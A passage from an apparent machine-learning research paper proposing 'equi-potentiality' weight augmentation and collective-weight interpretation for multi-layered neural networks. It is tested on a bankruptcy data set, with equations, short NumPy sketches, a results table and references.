The importance of equi-potentiality of components has been well recognized in the conventional competitive learning [1], self-organizing maps [2–8], and related information-theoretic methods [9]. The competitive learning aims to discover distinctive features in input patterns by determining output neurons maximally responding to specific inputs. In this method, the output neurons naturally should have the basic and specific features to win the competition. In addition, it is supposed that all neurons should be equally responsible for representing inputs, namely, equi-potentiality in this paper. Though this equi-potentiality has been recognized from the beginning, this property has not necessarily been implemented with success. The problem of dead neurons without any potentiality has been one of the major problems in competitive learning [10–16]. Thus, though the importance of equi-potentiality has been considered significant, the method for equi-potentiality has not been well established until now.

In addition, this equi-potentiality has been considered important in information-theoretic methods, though little attention has been paid to this property due to the complexity of computation [9, 17–23]. For example, this equi-potentiality has been expressed in the form of mutual information in neural networks. In terms of potentiality, mutual information can be decomposed as the equi-potentiality of components and the specification of each component. Thus, this information-theoretic method deals not only with the acquisition of specific information but also with the equal use of all components, quite similar to the case with competitive learning. The importance of equi-potentiality has been recognized, but this property has not been fully considered due to the complexity of computing mutual information.
1.3 Regularization
The equi-potentiality should be related to the well-known regularization in neural networks [24–28], but the equi-potentiality has not received due attention in the explicit and implicit regularization. For example, to improve generalization, the weight decay and its related methods have been introduced to restrict the potentiality of weights. These may cause no problems in learning when we suppose that neural networks can immediately choose appropriate solutions among many. However, if not, the regularization methods have difficulty in seeking other solutions in the course of learning. This paper tries to show that we need to introduce the equi-potentiality of weights to find appropriate ones among many possibilities. Though the random noises or similar
effects in the conventional learning are expected to be effective in this restoration, those methods are insufficient to find appropriate solutions in learning. This paper shows that, for the regularization to be effective, the concept of equi-potentiality should play more active roles in increasing the possibility of finding final and appropriate weights.

Related to the regularization discussed above and the equi-potentiality, a new hypothesis for learning has recently received due attention, namely, the lottery ticket hypothesis [29–36], where learning is considered not as a process of creating appropriate models but as a process of finding or mining them from already existing ones. Behind a process of finding appropriate models from many in the case of huge multi-layered neural networks, there should, though implicitly, be a principle of equi-potentiality of any components or sub-networks. As mentioned above, learning is a process of reducing the potentiality in a neural network. By the effect of implicit and explicit regularization, error reduction between outputs and targets can only be realized by reducing the potentiality of some components. Thus, the lottery ticket hypothesis can be realized only based on the equi-potentiality of all components or sub-networks. More strongly, we should say that the lottery ticket hypothesis cannot be valid unless the property of equi-potentiality of components or sub-networks is supposed. Thus, the lottery ticket hypothesis may be sound in principle. However, in actual learning, we need to develop a method to realize actively the equi-potentiality of all components and sub-networks.
1.4 Comprehensive Interpretation
Finally, because the present paper tries to interpret the final internal representations in neural networks, we should mention the relation of equi-potentiality to the interpretation.
As is well known, the interpretation of final internal representations created by neural networks has been one of the main problems in theoretical as well as practical studies [37–42]. Unless we understand the main mechanism of neural networks, the improvement of learning methods becomes difficult, and without explaining the inference mechanism of neural networks, it is almost impossible for the neural networks to be used for specific and practical applications. One of the main problems in interpreting neural networks lies in the naturally distributed characteristics of inference processing. The actual inference is supposed to be performed through the collaboration of a number of different components inside with input patterns and initial conditions outside. In spite of this distributed property, the main interpretation methods so far developed, especially for convolutional neural networks, have focused on a specific instance of the inference mechanism, and this can be called “local interpretation” [43–57], to cite a few. At this point, we should introduce the equi-potentiality into the field of interpretation. This means that, though it may be useful to have a specific interpretation for a specific example of the interpretation problem, we need to consider all possible representations for the problem. More strongly, we should suppose that all possible representations should have equal potentiality for appropriate interpretation. Returning to the above discussion on the equi-potentiality of components, we need to consider all possible representations and any different configurations of components as equally as possible. Once again, we should stress that the majority of interpretation methods seem to be confined within a specific instance of possible interpretations. We need to develop a method to consider as many instances as possible for comprehensive interpretation.
In this paper, we interpret the inference mechanism, supposing that all instances have the same status or importance and all representations have the equal potentiality for interpretation. Thus, the interpretation can be as comprehensive as possible.
1.5 Paper Organization
In Sect. 2, we try to explain the concepts of potentiality and how to define two types of potentiality: total and relative potentiality. After briefly explaining how to train neural networks with the potentiality, we introduce the collective interpretation in which all possible instances of interpretation have the same importance. In particular, we show how a single hidden neuron tries to detect features by this interpretation method. Finally, we apply the method to the bankruptcy data set. We try to show how the final representations can be changed by repeating and augmenting the potentiality of connection weights in hidden layers. The final results show that, for improving generalization, it is necessary to control the total potentiality and to increase the relative potentiality. By examining the whole sets of final representations, we can see which inputs are important in inferring the bankruptcy of companies.
2 Theory and Computational Methods
2.1 Repeated Potentiality Reduction and Augmentation
In this paper, it is supposed that the total potentiality of components such as connection weights, neurons, and layers tends to decrease. Learning is considered a process of reducing the initial potentiality for some specific objectives of learning. This reduction in potentiality can restrict the flexibility of learning, which is necessary in obtaining appropriate information for any components. Thus, we need to restore the potentiality to increase the possibility of obtaining appropriate components. As shown in Fig. 1, we suppose that a network has maximum potentiality only when each connection weight is connected equally with all neurons. The maximum potentiality means that all neurons have the same potentiality to be connected with the other neurons. In a process of learning, error minimization between outputs and targets forces some connection weights to become stronger, which is necessary in reducing errors between outputs and targets. If these connection weights are not well suited for error minimization, we need to move to other connection weights. This paper supposes that we need to restore the initial potentiality as much as possible for neurons to have an equal chance of being chosen at any time of learning, as in Fig. 1(b). In a process of learning, we should repeat this process of reduction and augmentation as many times as possible for obtaining the final appropriate connection weights, shown in Fig. 1(d) and (e).
2.2 Total and Relative Information
In this paper, the potentiality in a hidden layer can be represented by the sum of all individual potentialities. The individual potentiality can be defined, as a first approximation, by the absolute weights. For simplicity, we consider weights from the second to the third layer, represented by (2, 3), and the individual potentiality is defined by

$$ u_{jk}^{(2,3)} = \left| w_{jk}^{(2,3)} \right| \tag{1} $$

Then, the total potentiality is the sum of all individual potentialities in the layer.

$$ T^{(2,3)} = \sum_{j=1}^{n_2} \sum_{k=1}^{n_3} u_{jk}^{(2,3)} \tag{2} $$

Fig. 1. Repeated potentiality reduction and augmentation.
where $n_2$ and $n_3$ denote the number of neurons in each layer. As mentioned above, learning is considered as the reduction of this potentiality. One possible way to achieve this reduction is to reduce the number of strong weights, so we should count the number of strong weights in a layer. The relative potentiality is introduced to represent the number of strong weights in a layer. It is the potentiality relative to the corresponding maximum potentiality.

$$ r_{jk}^{(2,3)} = \frac{u_{jk}^{(2,3)}}{\max_{j'k'} u_{j'k'}^{(2,3)}} \tag{3} $$
where the max operation is over all connection weights between the layers. In addition, we define the complementary one by

$$ \bar{r}_{jk}^{(2,3)} = 1 - \frac{u_{jk}^{(2,3)}}{\max_{j'k'} u_{j'k'}^{(2,3)}} \tag{4} $$
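Eqs. (1) to (4) can be sketched in a few lines of NumPy. This is only an illustrative sketch: the function names and the small weight matrix are hypothetical and are not taken from the paper or from any library.

```python
import numpy as np


def individual_potentiality(w):
    """Eq. (1): absolute value of every connection weight."""
    return np.abs(w)


def total_potentiality(w):
    """Eq. (2): sum of the individual potentialities over the layer."""
    return individual_potentiality(w).sum()


def relative_potentiality(w):
    """Eq. (3): individual potentiality divided by the layer maximum."""
    u = individual_potentiality(w)
    u_max = u.max()
    if u_max == 0:
        # The ratio is undefined when every weight is exactly zero.
        raise ValueError("at least one weight must be non-zero")
    return u / u_max


def complementary_potentiality(w):
    """Eq. (4): one minus the relative potentiality."""
    return 1.0 - relative_potentiality(w)


# Hypothetical 2 x 3 weight matrix (n2 = 2, n3 = 3), for illustration only.
w = np.array([[0.5, -2.0, 1.0],
              [0.0, 1.0, -0.5]])

print(total_potentiality(w))
print(relative_potentiality(w))
print(complementary_potentiality(w))
```

In this toy matrix the weight of largest magnitude has relative potentiality one and complementary potentiality zero, which is the property the learning rules later rely on.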
We simply call these quantities “potentiality” and “complementary potentiality”. By using this potentiality, the relative potentiality of the layer can be computed by

$$ R^{(2,3)} = \sum_{j=1}^{n_2} \sum_{k=1}^{n_3} \frac{u_{jk}^{(2,3)}}{\max_{j'k'} u_{j'k'}^{(2,3)}} \tag{5} $$

When all potentialities become equal, naturally, the relative potentiality becomes maximum. On the other hand, when only one potentiality becomes one while all the others are zero, the relative potentiality becomes minimum. For simplicity, we suppose that at least one connection weight should be non-zero.
2.3 Repeated Learning
Learning is composed of two phases. In the first phase, we try to increase the total potentiality and at the same time increase the relative potentiality. For the (n + 1)th learning step, weights are computed by

$$ w_{jk}^{(2,3)}(n+1) = \theta \, \bar{r}_{jk}^{(2,3)}(n) \, w_{jk}^{(2,3)}(n) \tag{6} $$
where the parameter θ should be larger than one, which has the effect of increasing the total potentiality. In addition, the complementary potentiality $\bar{r}$ is used to decrease weight strength in direct proportion to the strength of the weights. This means that larger weights become smaller, and eventually all weights become smaller and equally distributed. In the second phase, the parameter θ is less than one, reducing the strength of weights. In addition, the relative potentiality $r$ is used to reduce the strength of weights further, except for the strongest weight, whose relative potentiality is one.

$$ w_{jk}^{(2,3)}(n+1) = \theta \, r_{jk}^{(2,3)}(n) \, w_{jk}^{(2,3)}(n) \tag{7} $$
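The two update rules can be sketched as follows, under a literal reading of Eqs. (6) and (7). The function names, the values of θ, and the toy weight matrix are assumptions made for illustration. How these updates are interleaved with the error-minimization steps is not specified at this point in the text and is left out of the sketch.

```python
import numpy as np


def relative(w):
    """Eq. (3): relative potentiality of each weight."""
    u = np.abs(w)
    return u / u.max()


def summed_relative(w):
    """Eq. (5): sum of the relative potentialities over the layer."""
    return relative(w).sum()


def augment_step(w, theta):
    """Eq. (6), first phase: theta > 1, scaled by the complementary potentiality."""
    return theta * (1.0 - relative(w)) * w


def reduce_step(w, theta):
    """Eq. (7), second phase: theta < 1, scaled by the relative potentiality."""
    return theta * relative(w) * w


# Hypothetical weights and theta values, chosen only for illustration.
w = np.array([[0.5, -2.0, 1.0],
              [0.2, 1.0, -0.5]])
w_aug = augment_step(w, theta=1.3)
w_red = reduce_step(w, theta=0.9)

print(summed_relative(w), summed_relative(w_aug), summed_relative(w_red))
```

For this toy matrix the summed relative potentiality rises after the augmentation step and falls after the reduction step. Under this literal reading, the weight of largest magnitude has complementary potentiality zero and is therefore set to zero by a single application of Eq. (6).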
As shown in Fig. 1, this process of reduction and augmentation is repeated several times in learning.
2.4 Full and Partial Compression
The interpretation in this paper tries to be as comprehensive as possible. For realizing this, we suppose that all components and all intermediate states have the same status and importance for interpretation. This is the equi-potentiality principle of interpretation, as mentioned above.
First, for interpreting multi-layered neural networks, we compress them into the simplest ones, as shown in Fig. 2(a). We trace all routes from inputs to the corresponding outputs by multiplying and summing all corresponding connection weights. We begin by compressing connection weights from the first to the second layer, denoted by (1, 2), and from the second to the third layer, denoted by (2, 3), for an initial condition and a subset of a data set.
Fig. 2. Network compression from the initial state to the simplest and compressed network, and final collective weights by full compression (a) and partial compression (b).
Then, we have the compressed weights between the first and the third layer, denoted by (1, 3).

$$ w_{ik}^{(1,3)} = \sum_{j=1}^{n_2} w_{ij}^{(1,2)} w_{jk}^{(2,3)} \tag{8} $$
Those compressed weights are further combined with weights from the third to the fourth layer (3, 4), and we have the compressed weights between the first and the fourth layer (1, 4).
$$ w_{il}^{(1,4)} = \sum_{k=1}^{n_3} w_{ik}^{(1,3)} w_{kl}^{(3,4)} \tag{9} $$
By repeating these processes, we have the compressed weights between the first and fifth layer, denoted by $w_{iq}^{(1,5)}$. Using those connection weights, we have the final and fully compressed weights (1, 6).

$$ w_{ir}^{(1,6)} = \sum_{q=1}^{n_5} w_{iq}^{(1,5)} w_{qr}^{(5,6)} \tag{10} $$
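Eqs. (8) to (10) amount to a chain of matrix products, which can be sketched as below. The layer sizes and the random weights are hypothetical. The sketch assumes each weight matrix is stored with shape (inputs, outputs), so that the index order matches $w_{ij}^{(1,2)}$.

```python
from functools import reduce

import numpy as np


def full_compression(weights):
    """Multiply the layer-to-layer weight matrices in order, as in Eqs. (8)-(10)."""
    return reduce(np.matmul, weights)


# Hypothetical six-layer network: 6 inputs, four hidden layers of 10 neurons, 1 output.
rng = np.random.default_rng(0)
sizes = [6, 10, 10, 10, 10, 1]
weights = [rng.normal(size=(a, b)) for a, b in zip(sizes[:-1], sizes[1:])]

w_13 = full_compression(weights[:2])  # Eq. (8): layers (1, 2) and (2, 3)
w_16 = full_compression(weights)      # Eq. (10): all layers
print(w_13.shape, w_16.shape)
```

Each row of the fully compressed matrix then holds one collective weight per output for the corresponding input variable.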
For the full compression, we compress all hidden layers as explained above. To examine the effect of a specific hidden layer, we compress a network with only that hidden layer, which can be called “partial” compression. By using this partial compression, we can examine what kind of features a hidden layer tries to deal with. In Fig. 2(b), we focus on the weights from the third to the fourth layer. We first combine the input and the hidden layer.

$$ w_{il}^{(1,(3,4))} = \sum_{k=1}^{n_3} w_{ik}^{(1,2)} w_{kl}^{(3,4)} \tag{11} $$
where the notation (1,(3,4)) means that only weights from the third to the fourth layer are considered. Then, these compressed weights are combined immediately with the output layer

$$ w_{ir}^{(1,(3,4),6)} = \sum_{q=1}^{n_5} w_{iq}^{(1,(3,4))} w_{qr}^{(5,6)} \tag{12} $$
In this way, we can consider only the effect by a single hidden layer. In this paper, the number of neurons in all hidden layers is supposed to be the same, but this method can be applied to the case where the number of neurons is different for each hidden layer.
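Partial compression, Eqs. (11) and (12), can be sketched in the same way. The function name and the layer sizes are hypothetical. The sketch assumes all hidden layers have the same number of neurons, so that the input weights, one hidden-to-hidden matrix, and the output weights can be multiplied directly.

```python
import numpy as np


def partial_compression(w_in, w_hidden, w_out):
    """Eqs. (11)-(12): input weights, one hidden-to-hidden matrix, output weights."""
    return w_in @ w_hidden @ w_out


# Hypothetical sizes: 6 inputs, hidden layers of 10 neurons, 1 output.
rng = np.random.default_rng(1)
w_12 = rng.normal(size=(6, 10))   # input layer to first hidden layer
w_34 = rng.normal(size=(10, 10))  # the single hidden-to-hidden matrix under study
w_56 = rng.normal(size=(10, 1))   # last hidden layer to output layer

w_partial = partial_compression(w_12, w_34, w_56)
print(w_partial.shape)
```

Repeating the call with each hidden-to-hidden matrix in turn would give one set of partially collective weights per hidden layer.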
3 Results and Discussion
3.1 Experimental Outline
The experiment aimed to infer the possibility of bankruptcy of companies, based on six input variables [58]. In the social sciences, neural networks have been used only reluctantly in analytical processes because their interpretation is difficult and unstable. However, the final results of conventional statistical methods have limited the scope of interpretation, ironically because of the stability and reliability of those methods. Neural networks, on the contrary, are more unstable models than the conventional statistical models, but this instability is related to the flexibility of interpretation. Neural networks naturally depend heavily on the inputs and initial conditions, as well as on any other conditions. This seems to be a fatal shortcoming, but it also means that neural networks have much potentiality to see an input from a number of different viewpoints. The only problem is that neural networks have so far tried to limit this potentiality as much as possible by using methods such as regularization. The present paper tries to
consider all these viewpoints by neural networks as much as possible for the comprehensive interpretation. Thus, this experiment on bankruptcy may be simple, but it is a good benchmark to show the flexibility and potentiality of our method of considering as many conditions as possible for a practical problem. The data set contained 130 companies, and we tried to classify whether or not the corresponding companies were in a state of bankruptcy. We used very redundant ten-layered neural networks with ten hidden layers. The potentiality of hidden layers was controlled by our potentiality method, while the input and output layers remained untouched by the new method, because we had difficulty in controlling the input and output layers by the present method. To make the final results in this paper easy to reproduce, we used the neural network package in the scikit-learn software package, where almost all parameters remained as the default ones except for the activation function (changed to the hyperbolic tangent) and the number of learning epochs (determined by the potentiality method).
3.2 Potentiality Computation
The results show that when the parameter θ increased gradually, total potentiality became larger, while oscillating greatly. The relative potentiality tended to be close to its maximum value by this effect. However, too-large parameter values caused extremely large potentiality. We first show the final results of total potentiality and relative potentiality by the conventional method and the new methods. Figure 3 shows total potentiality (left) and relative potentiality (right). By the conventional method in Fig. 3(a), total potentiality (left) and relative potentiality (right) remained almost constant, independently of learning steps. When the parameter θ was 1.0 in Fig. 3(b), total potentiality (left) was small and tended to decrease as the number of learning steps increased.
On the other hand, the relative potentiality (right) increased gradually as a function of the number of learning steps. However, the total potentiality could not come close to the maximum values. When the parameter θ increased to 1.1 in Fig. 3(c), the total potentiality was slightly larger, and the oscillation of relative potentiality became clear, meaning that the relative potentiality tried to increase with an up-and-down movement. When the parameter θ increased to 1.2 in Fig. 3(d), the oscillation could be clearly seen both in the total potentiality and relative potentiality. When the parameter θ increased to 1.3 with the best generalization in Table 1, the oscillation of total potentiality became the largest, and the total potentiality tended to increase. In addition, the relative potentiality, while oscillating, became close to the maximum value. When the parameter θ increased further to 1.4 in Fig. 3(f) and 1.5 in Fig. 3(g), the total potentiality tended to have extreme values, and the relative potentiality became close to the maximum values without oscillation.
3.3 Collective Weights
The results show that, when the parameter θ was relatively small, collective weights and the ratio of the collective weights to the original correlation coefficients were similar to those by the conventional method. When the parameter θ was further increased to 1.3,
Fig. 3. Total potentiality (Left) and relative potentiality (Right) as a function of the number of steps by the conventional method (a), and by the new methods when the parameter θ increased from 1.0 (b) to 1.5 (g) for the bankruptcy data set. A boxed figure represents a state with maximum generalization.
the collective weights and the ratio became completely different from the original correlation coefficients and the ratio by the conventional method. This means that the neural networks tended to obtain weights close to the original correlation coefficients, but when generalization performance was forced to increase, completely different weights could be obtained. Figure 4(a) shows the collective weights (left) and ratio (middle) of absolute collective weights to the absolute correlation coefficients, and the original correlation coefficients between inputs and target (right) by using the conventional method. As can be seen in the left-hand figure, input No. 2 (capital adequacy ratio) and especially
No. 5 (sales C/F to current liabilities) were strongly negative. The ratio of the collective weights to the correlation coefficients (middle) shows that the strength increased gradually when the input number increased from 1 to 5. This means that input No. 5 played an important role linearly and non-linearly. When the parameter θ was 1.0 in Fig. 4(b), almost the same tendencies could be seen in all measures except the ratio (middle). The ratio was different from that by the conventional method, where input No. 6 (sales per person) had larger strength. When the parameter θ increased to 1.1, this tendency was clearer, and input No. 6 had the largest strength. When the parameter θ was 1.2 in Fig. 4(d), the collective weights (left) were different from the correlation coefficients, but the ratio still tended to have the same characteristics. When the parameter θ increased to 1.3 with the best generalization in Fig. 4(e), the collective weights were completely different from the original correlation coefficients, and input No. 3 (sales growth rates) took the highest strength. When the parameter θ increased to 1.4 in Fig. 4(f) and 1.5 in Fig. 4(g), all measures again became similar to those by the conventional method, though in the ratio (middle), some differences could be detected. The results show that neural networks tended to produce collective weights close to the original correlation coefficients. However, when the generalization was forced to increase by increasing the parameter, the collective weights became different from the correlation coefficients. Thus, neural networks could extract weights close to the correlation coefficients, and in addition, the networks could produce weights different from the correlation coefficients, which tried to extract, roughly speaking, non-linear relations between inputs and outputs. 
3.4 Partially Collective Weights
The partially collective weights show that the conventional method tended to use the hidden layers close to the input and output layers. On the contrary, the new methods tried to focus on the hidden layer close to either the input or the output layer. However, to obtain the best generalization performance, all hidden layers should be somehow used. Figure 5 shows the collective weights computed by a single hidden layer. In the figure, from left to right and top to bottom, the collective weights were plotted by computing collective weights only with a single hidden layer. As shown in Fig. 5(a) by the conventional method, one of the most important characteristics is that the collective weights computed with the hidden layer close to the input layer (top left) and the output layer (bottom right) were relatively larger, meaning that the hidden layers close to the input and output layers tended to have much information content. On the contrary, when the parameter θ was 1.0 in Fig. 5(b), only the collective weights with the hidden layer close to the output layer had larger strength. When the parameter θ increased to 1.5 in Fig. 5(d), only the collective weights with the hidden layer close to the input layer had larger strength. However, when the parameter θ increased to 1.3 with the best generalization performance in Fig. 5(c), the collective weights for almost all hidden layers tended to have a somewhat large strength, meaning that to improve generalization performance, it is necessary to somehow use all possible hidden layers.
Fig. 4. The collective weights (Left), the ratio (Middle) of absolute collective weights to absolute correlation coefficients, and the original correlation coefficients (Right) by the conventional method (a) and when the parameter θ increased from 1.0 (b) to 1.5 (g) for the bankruptcy data set.
Fig. 5. Partially collective weights with only a single hidden layer for the bankruptcy data set.
Table 1. Summary of experimental results on average correlation coefficients and generalization performance for the bankruptcy data set. The numbers in the method represent the values of the parameter θ to control the potentialities. Letters in bold type indicate the maximum values.

Method          Correlation   Accuracy
1.0              0.882        0.882
1.1              0.863        0.879
1.2             −0.510        0.900
1.3              0.362        0.908
1.4              0.788        0.897
1.5              0.879        0.862
Conventional     0.811        0.877
Logistic         0.979        0.813
Random forest   −0.905        0.779

3.5 Correlation and Generalization
The new method could produce the best generalization by using the weights far from the original correlation coefficients, while the conventional logistic regression naturally produced coefficients very close to the original correlation coefficients. Table 1 shows the summary of results on correlation and generalization. The generalization accuracy increased from 0.882 (θ = 1.0) to the largest one of 0.908 (θ = 1.3). The correlation coefficient between collective weights and the original correlation coefficient of the data set decreased from 0.882 (θ = 1.0) to 0.362 (θ = 1.3), and again, the correlation increased. When the generalization performance was the largest and the parameter θ was 1.3, the strength of the correlation became the smallest. This means that, to improve generalization performance, we need to use some non-linear relations in a broad sense. The logistic regression analysis produced an almost perfect correlation of 0.979, but the generalization was the second worst at 0.813, behind the random forest. The random forest produced a high negative correlation, because the importance could not take into account the negativity of inputs. Neural networks could improve generalization performance even if the weights represent linear relations between inputs and outputs. However, when the networks are forced to increase generalization, they try to use non-linear relations different from the correlation coefficients.
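The two quantities compared in this section, the correlation between collective weights and the input-target correlation coefficients and the ratio of their absolute values, can be sketched as follows. All data here are synthetic and the function names are hypothetical. The sketch only shows how such measures could be computed and does not reproduce the values in Table 1.

```python
import numpy as np


def input_target_correlations(x, y):
    """Pearson correlation between each input column and the target."""
    return np.array([np.corrcoef(x[:, i], y)[0, 1] for i in range(x.shape[1])])


def agreement(collective_weights, correlations):
    """Correlation between collective weights and input-target correlations."""
    return np.corrcoef(collective_weights, correlations)[0, 1]


def strength_ratio(collective_weights, correlations):
    """Ratio of absolute collective weights to absolute correlation coefficients."""
    return np.abs(collective_weights) / np.abs(correlations)


# Synthetic stand-in for a data set with 130 samples and six inputs.
rng = np.random.default_rng(0)
x = rng.normal(size=(130, 6))
beta = np.array([0.5, -1.0, 0.3, 0.0, -2.0, 0.8])  # hypothetical coefficients
y = (x @ beta > 0).astype(float)

corr = input_target_correlations(x, y)
collective = 2.0 * corr  # hypothetical collective weights, proportional to corr
print(agreement(collective, corr))
print(strength_ratio(collective, corr))
```

Collective weights that are exactly proportional to the correlation coefficients give an agreement of one. An agreement far from one indicates that the compressed network weighs the inputs differently from a simple correlation analysis.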
4 Conclusion
The present paper showed the importance of equi-potentiality of components. The total potentiality can be defined in terms of the sum of absolute weights, and relative potentiality can be defined with respect to the maximum potentiality. We suppose that all components in neural networks should be used as equally as possible, at least in the course of learning, for the final representations to consider as many situations as possible. However, this equi-potentiality tends to decrease in the course of learning, because
learning can be considered a process to transform the potentiality into the real information to be used in actual learning. Thus, we need to restore the potentiality of components as much as possible at any time. Every time the potentiality decreases, we need to re-increase the potentiality in learning for all components to have an equal chance to be chosen in learning. The same principle of equi-potentiality applies not only to the learning processes but also to the interpretation. In the conventional interpretation methods, a specific and local interpretation is applied, even though we have a number of different representations. In our interpretation method, all those representations have the same status and importance, and they should be taken into account for the interpretation to be as comprehensive as possible. The method was applied to the bankruptcy data set. By repeating and augmenting the potentiality, we could produce results with different generalization and correlation. By examining all those instances, we could infer the basic inference mechanism in the bankruptcy. The results confirmed that the weights were quite close to the original correlation coefficients between inputs and targets when the potentiality was not sufficiently increased. Then, when the generalization was forced to increase by increasing the potentiality, collective weights far from the original correlation coefficients were obtained. This finding with better generalization can be due to the equal consideration of all representations created by neural networks. One of the main problems is how to combine different computational procedures such as total and relative potentiality reduction and augmentation. We need to examine how to control those computational procedures for improving generalization and interpretation.
Though some problems in computation should be solved for practical application, the results on the equi-potentiality can contribute to understanding the main inference mechanism of neural networks.
References
1. Rumelhart, D.E., Zipser, D.: Feature discovery by competitive learning. Cogn. Sci. 9, 75–112 (1985)
2. Kohonen, T.: Self-Organizing Maps. Springer, Heidelberg (1995). https://doi.org/10.1007/978-3-642-97610-0
3. Himberg, J.: A SOM based cluster visualization and its application for false colouring. In: Proceedings of the International Joint Conference on Neural Networks, pp. 69–74 (2000)
4. Bogdan, M., Rosenstiel, W.: Detection of cluster in self-organizing maps for controlling a prostheses using nerve signals. In: 9th European Symposium on Artificial Neural Networks, ESANN 2001, Proceedings, pp. 131–136. D-Facto, Evere, Belgium (2001)
5. Yin, H.: Visom-a novel method for multivariate data projection and structure visualization. IEEE Trans. Neural Networks 13(1), 237–243 (2002)
6. Brugger, D., Bogdan, M., Rosenstiel, W.: Automatic cluster detection in Kohonen’s SOM. IEEE Trans. Neural Networks 19(3), 442–459 (2008)
7. Xu, L., Xu, Y., Chow, T.W.S.: PolSOM: a new method for multidimensional data visualization. Pattern Recogn. 43(4), 1668–1675 (2010)
8. Xu, L., Xu, Y., Chow, T.W.S.: PolSOM-a new method for multidimensional data visualization. Pattern Recogn. 43, 1668–1675 (2010)
9. Linsker, R.: Self-organization in a perceptual network. Computer 21(3), 105–117 (1988)
10. DeSieno, D.: Adding a conscience to competitive learning. In: IEEE International Conference on Neural Networks, vol. 1, pp. 117–124. Institute of Electrical and Electronics Engineers, New York (1988)
11. Fritzke, B.: Vector quantization with a growing and splitting elastic net. In: Gielen, S., Kappen, B. (eds.) ICANN 1993, pp. 580–585. Springer, London (1993). https://doi.org/10.1007/978-1-4471-2063-6_161
12. Fritzke, B.: Automatic construction of radial basis function networks with the growing neural gas model and its relevance for fuzzy logic. In: Applied Computing 1996: Proceedings of the 1996 ACM Symposium on Applied Computing, Philadelphia, pp. 624–627. ACM (1996)
13. Choy, C.S., Siu, W.: A class of competitive learning models which avoids neuron underutilization problem. IEEE Trans. Neural Networks 9(6), 1258–1269 (1998)
14. Van Hulle, M.M.: Faithful representations with topographic maps. Neural Netw. 12(6), 803–823 (1999)
15. Banerjee, A., Ghosh, J.: Frequency-sensitive competitive learning for scalable balanced clustering on high-dimensional hyperspheres. IEEE Trans. Neural Networks 15(3), 702–719 (2004)
16. Van Hulle, M.M.: Entropy-based kernel modeling for topographic map formation. IEEE Trans. Neural Networks 15(4), 850–858 (2004)
17. Linsker, R.: Self-organization in a perceptual network. Computer 21, 105–117 (1988)
18. Linsker, R.: How to generate ordered maps by maximizing the mutual information between input and output signals. Neural Comput. 1(3), 402–411 (1989)
19. Linsker, R.: Local synaptic learning rules suffice to maximize mutual information in a linear network. Neural Comput. 4(5), 691–702 (1992)
20. Torkkola, K.: Feature extraction by non-parametric mutual information maximization. J. Mach. Learn. Res. 3, 1415–1438 (2003)
21. Leiva-Murillo, J.M., Artés-Rodríguez, A.: Maximization of mutual information for supervised linear feature extraction. IEEE Trans. Neural Networks 18(5), 1433–1441 (2007)
22. Van Hulle, M.M.: The formation of topographic maps that maximize the average mutual information of the output responses to noiseless input signals. Neural Comput. 9(3), 595–606 (1997)
23. Principe, J.C.: Information Theoretic Learning: Renyi’s Entropy and Kernel Perspectives. Springer, New York (2010). https://doi.org/10.1007/978-1-4419-1570-2
24. Moody, J., Hanson, S., Krogh, A., Hertz, J.A.: A simple weight decay can improve generalization. Adv. Neural. Inf. Process. Syst. 4, 950–957 (1995)
25. Kukačka, J., Golkov, V., Cremers, D.: Regularization for deep learning: a taxonomy. arXiv preprint arXiv:1710.10686 (2017)
26. Goodfellow, I., Bengio, Y., Courville, A.: Regularization for deep learning. Deep Learn. 216–261 (2016)
27. Wu, C., Gales, M.J.F., Ragni, A., Karanasou, P., Sim, K.C.: Improving interpretability and regularization in deep learning. IEEE/ACM Trans. Audio Speech Language Process. 26(2), 256–265 (2017)
28. Fan, F.-L., Xiong, J., Li, M., Wang, G.: On interpretability of artificial neural networks: a survey. IEEE Trans. Radiat. Plasma Med. Sci. 5, 741–760 (2021)
29. Ma, X., et al.: Sanity checks for lottery tickets: does your winning ticket really win the jackpot? In: Advances in Neural Information Processing Systems, vol. 34 (2021)
30. Bai, Y., Wang, H., Tao, Z., Li, K., Fu, Y.: Dual lottery ticket hypothesis. arXiv preprint arXiv:2203.04248 (2022)
31. da Cunha, A., Natale, E., Viennot, L.: Proving the strong lottery ticket hypothesis for convolutional neural networks. In: International Conference on Learning Representations (2022)
32. Chen, X., Cheng, Y., Wang, S., Gan, Z., Liu, J., Wang, Z.: The elastic lottery ticket hypothesis. In: Advances in Neural Information Processing Systems, vol. 34 (2021)
33. Malach, E., Yehudai, G., Shalev-Shwartz, S., Shamir, O.: Proving the lottery ticket hypothesis: pruning is all you need. In: International Conference on Machine Learning, pp. 6682–6691. PMLR (2020)
34. Frankle, J., Dziugaite, G.K., Roy, D., Carbin, M.: Linear mode connectivity and the lottery ticket hypothesis. In: International Conference on Machine Learning, pp. 3259–3269. PMLR (2020)
35. Frankle, J., Dziugaite, G.K., Roy, D.M., Carbin, M.: Stabilizing the lottery ticket hypothesis. arXiv preprint arXiv:1903.01611 (2019)
36. Frankle, J., Carbin, M.: The lottery ticket hypothesis: finding sparse, trainable neural networks. arXiv preprint arXiv:1803.03635 (2018)
37. Goodman, B., Flaxman, S.: European union regulations on algorithmic decision-making and a right to explanation. arXiv preprint arXiv:1606.08813 (2016)
38. Arrieta, A.B., et al.: Explainable artificial intelligence (XAI): concepts, taxonomies, opportunities and challenges toward responsible AI. Inf. Fusion 58, 82–115 (2020)
39. Rudin, C.: Stop explaining black box machine learning models for high stakes decisions and use interpretable models instead. Nat. Mach. Intell. 1(5), 206–215 (2019)
40. Rai, A.: Explainable AI: from black box to glass box. J. Acad. Mark. Sci. 48(1), 137–141 (2020)
41. Weidele, D.K.I., et al.: Opening the blackbox of automated artificial intelligence with conditional parallel coordinates. In: Proceedings of the 25th International Conference on Intelligent User Interfaces, pp. 308–312 (2020)
42. Pintelas, E., Livieris, I.E., Pintelas, P.: A grey-box ensemble model exploiting black-box accuracy and white-box intrinsic interpretability. Algorithms 13(1), 17 (2020)
43. Nguyen, A., Yosinski, J., Clune, J.: Understanding neural networks via feature visualization: a survey. In: Samek, W., Montavon, G., Vedaldi, A., Hansen, L.K., Müller, K.-R. (eds.) Explainable AI: Interpreting, Explaining and Visualizing Deep Learning. LNCS (LNAI), vol. 11700, pp. 55–76. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-28954-6_4
44. Erhan, D., Bengio, Y., Courville, A., Vincent, P.: Visualizing higher-layer features of a deep network. University of Montreal, 1341 (2009)
45. Nguyen, A., Clune, J., Bengio, Y., Dosovitskiy, A., Yosinski, J.: Plug & play generative networks: conditional iterative generation of images in latent space. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 4467–4477 (2017)
